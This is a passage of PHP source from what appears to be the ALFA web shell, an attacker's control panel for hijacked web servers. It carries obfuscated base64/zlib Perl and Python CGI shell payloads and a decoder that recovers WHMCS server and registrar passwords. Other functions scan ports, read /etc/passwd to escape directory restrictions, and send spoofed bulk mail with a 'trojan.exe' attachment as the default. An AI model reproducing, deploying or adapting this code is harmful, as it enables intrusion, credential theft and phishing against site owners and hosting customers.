if((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])){
$data = json_decode($_POST['alfa2'], true);
$alfadata = $data['__ALFADATA'];
$data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
$keyval = array();
echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data['__ALFATBL'].'</font></p>');
echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
$set = '';
foreach($data as $key => $value){
if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
if($data2['__ALFAKEY']==$key){
$keyval['__ALFAKEY'] = $key;
$keyval['__ALFAKEYVAL'] = $value;
}
$set .= "`$key` = '".addslashes($value)."',";
$value = htmlspecialchars($value);
echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
}
unset($data['__ALFADATA']);

echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY'])?array('__ALFAKEY'=>$keyval['__ALFAKEY'],'__ALFAKEYVAL'=>$keyval['__ALFAKEYVAL']):$data)))."'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");

if(!isset($data2['__ALFAKEY'])){
$where = '';
foreach($data2 as $key => $value){
if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
$value = addslashes($value);
$where .= "`$key` = '$value' AND ";
}
$where = substr($where, 0, -4);
}else{
$where = "`{$data2['__ALFAKEY']}` = '".addslashes($data2['__ALFAKEYVAL'])."'";
}
$set = substr($set, 0, -1);
$db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
if($db->error())
echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
else echo("Success...!");
}
if($_POST['alfa1']!='edit'&&$_POST['alfa1']!='update'){
echo "<p>Query:</p><form onsubmit='fs(this);return false;'>
<input type='hidden' name='alfa1' value='query'/>
<textarea name='query' style='width:100%;height:100px'>";
echo $_POST['alfa1']!='loadfile'?htmlspecialchars($_POST['alfa2']):'';
echo "</textarea><p><center><input type=submit value=' '></center></p></form>";
}
echo "</td></tr>";
}
echo "</table></form><br/>";
if($_POST['type']=='mysql') {
$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
if($db->fetch())
echo "<form onsubmit=\"fs('3',this.f.value);return false;\"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
}
if(@$_POST['alfa1'] == 'loadfile'){
$file = $db->loadFile($_POST['alfa2']);
echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
}
}else{
echo htmlspecialchars($db->error());
}
echo '</div>';
alfafooter();
}
function alfaselfrm(){
if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
echo(__pre().'<center>');
if(@unlink($GLOBALS['__file_path'])){
echo('<b>Shell has been removed</i> :)</b>');
}else{
echo 'unlink error!';
}
echo('</center>');
}
if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
echo "<div class=header>";
echo "
<center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
echo '</p></center></div>';
}
}
function alfacgishell(){
alfahead();
$div = "";
if(!in_array($_POST['alfa1'],array('perl','py'))){
$div = "</div>";
echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a>';
}
if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
@mkdir('cgialfa',0755);
@chdir('cgialfa');
alfacgihtaccess('cgi');
$name = $_POST['alfa1'].'.alfa';
$perl = '#!/usr/bin/perl   -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
$py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
if(__write_file($name,$code)){
@chmod($name,0755);
echo '<iframe src="'.'cgialfa/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
}
}
echo $div;
alfafooter();
}
function alfaWhmcs(){
alfahead();
echo '<div class=header>';
function decrypt($string,$cc_encryption_hash){
$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
$hash_key = _hash($key);
$hash_length = strlen ($hash_key);
$string = __ZGVjb2Rlcg($string);
$tmp_iv = substr ($string, 0, $hash_length);
$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length)
{
$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen ($string))
{
if (($c != 0 AND $c % $hash_length == 0))
{
$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
}
$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
++$c;
}
return $out;
}
function _hash($string)
{
if(function_exists('sha1'))
{
$hash = sha1 ($string);
}
else
{
$hash = md5 ($string);
}
$out = '';
$c = 0;
while ($c < strlen ($hash))
{
$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
$c += 2;
}
return $out;
}
AlfaNum(8,9,10);
echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
<input type='hidden' name='form_action' value='2'>";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
if($_POST['alfa5']!=''){
$db_host=($_POST['alfa7']);
$db_username=($_POST['alfa3']);
$db_password=($_POST['alfa4']);
$db_name=($_POST['alfa5']);
$cc_encryption_hash=($_POST['alfa6']);
echo __pre();
$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
$query = mysqli_query($conn,"SELECT * FROM tblservers");
$num = mysqli_num_rows($query);
if ($num > 0){
for($i=0; $i <=$num-1; $i++){
$v = @mysqli_fetch_array($query);
$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];
echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
echo "</table><br><br></center>";
}
$query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
$num1 = @mysqli_num_rows($query1);
if ($num1 > 0){
for($i=0; $i <=$num1 -1; $i++){
$v = mysqli_fetch_array($query1);
$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt($v['value'], $cc_encryption_hash);
if ($value==""){
$value=0;
}
echo("<center>Domain Reseller <br><center>");
echo("<center><table border='1'>");
echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
echo "</table><br><br></center>";
}
}
}else{__alert('<font color="red">tblservers is Empty...!</font>');};
}
echo "</div>";
alfafooter();
}
function alfaportscanner(){
alfahead();
echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
<form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
<input type="hidden" name="y" value="phptools">
<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
<div class="txtfont">Port start: </div> <input id="text" size="5" type="text"  name="start" value="80"/>
<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
</form></center><br>';
$start = strip_tags($_POST['alfa2']);
$end = strip_tags($_POST['alfa3']);
$host = strip_tags($_POST['alfa4']);
if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
echo __pre();
$packetContent = "GET / HTTP/1.1\r\n\r\n";
if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
else{
$packetContent = str_replace(array("\r","\n"), "", $packetContent);
$packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
}
for($i = $start; $i<=$end; $i++){
$sock = @fsockopen($host, $i, $errno, $errstr, 3);
if($sock){
stream_set_timeout($sock, 5);
fwrite($sock, $packetContent."\r\n\r\n\x00");
$counter = 0;
$maxtry = 1;
$bin = "";
do{
$line = fgets($sock, 1024);
if(trim($line)=="")$counter++;
$bin .= $line;
}while($counter<$maxtry);
fclose($sock);
echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
echo "<p><textarea style='height:140px;width:50%;'>".$bin."</textarea></p></center>";
}
flush();
}
}
echo '</div>';
alfafooter();
}
function alfacgihtaccess($m,$d='', $symname=false){
$readme = "";
if($symname){$readme="\nReadmeName ".trim($symname);}
if($m=='cgi'){
$code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
}elseif($m=='sym'){
$code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
}elseif($m=='shtml'){
$code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
}
@__write_file($d.'.htaccess',$code);
}
function alfabasedir(){
alfahead();
echo '<div class=header>
<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
$passwd = _alfa_file('/etc/passwd');
if(is_array($passwd)){
$users = array();
$makepwd = alfaMakePwd();
$basedir = @ini_get('open_basedir');
$safe_mode = @ini_get('safe_mode');
if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
$bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
alfaWriteTocgiapi("basedir.alfa",$bash);
$bash_users  = alfaEx("cd alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
$users = json_decode($bash_users, true);
$x=count($users);
if($x>=2){array_pop($users);--$x;}
}
if(!$basedir&&!$safe_mode){
$x=0;
foreach($passwd as $str){
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = str_replace("{user}", $username, $makepwd);
if(($username != '')){
if (@is_readable($dirz)){
array_push($users,$username);
$x++;
}}}
}
echo '<br><br>';
echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
foreach($users as $user){
if(empty($user))continue;
$path = str_replace("{user}", $user, $makepwd);
echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
}
}else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
echo '<br><br></b>';
echo '</div>';
alfafooter();
}
function alfamail(){
alfahead();
echo '<div class=header>';
AlfaNum(8,9,10);
echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
$table = array(
'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
);
create_table($table);
echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
$mail_to = $_POST['alfa1'];
$mail_from = $_POST['alfa2'];
$mail_subject = $_POST['alfa3'];
$mail_content = $_POST['alfa5'];
$count_mail = (int)$_POST['alfa6'];
$mail_attach = $_POST['alfa7'];
if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
if(!empty($mail_attach)&&@is_file($mail_attach)){
$file = $mail_attach;
$content = __read_file($file);
$content = chunk_split(__ZW5jb2Rlcg($content));
$uid = md5(uniqid(time()));
$filename = basename($file);
$headers  = "From: ".$mail_from." <".$mail_from.">\r\n";
$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
$headers .= "Reply-To: ".$mail_from."\r\n";
$headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
$headers .= 'MIME-Version: 1.0' . "\r\n";
$headers .= 'X-Mailer: php' . "\r\n";
$mail_content  = "--".$uid."\r\n";
$mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
$mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
$mail_content .= $mail_content."\r\n\r\n";
$mail_content .= "--".$uid."\r\n";
$mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
$mail_content .= "Content-Transfer-Encoding: base64\r\n";
$mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
$mail_content .= $content."\r\n\r\n";
$mail_content .= "--".$uid."--";
}else{
$headers  = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
$headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
$headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
$headers .= 'MIME-Version: 1.0' . "\r\n";
$headers .= 'X-Mailer: php' . "\r\n";
}
if(empty($count_mail)||$count_mail<1)$count_mail=1;
if(!empty($mail_from)){echo __pre();
for($i=1;$i<=$count_mail;$i++){
if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
}}else{__alert("Invalid Mail From !");}
}else{__alert("Invalid Mail To !");}
}
echo('</div>');
alfafooter();
}
function alfaziper(){
alfahead();
AlfaNum(8,9,10);
echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
<form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['cwd']).'" size="60"/>
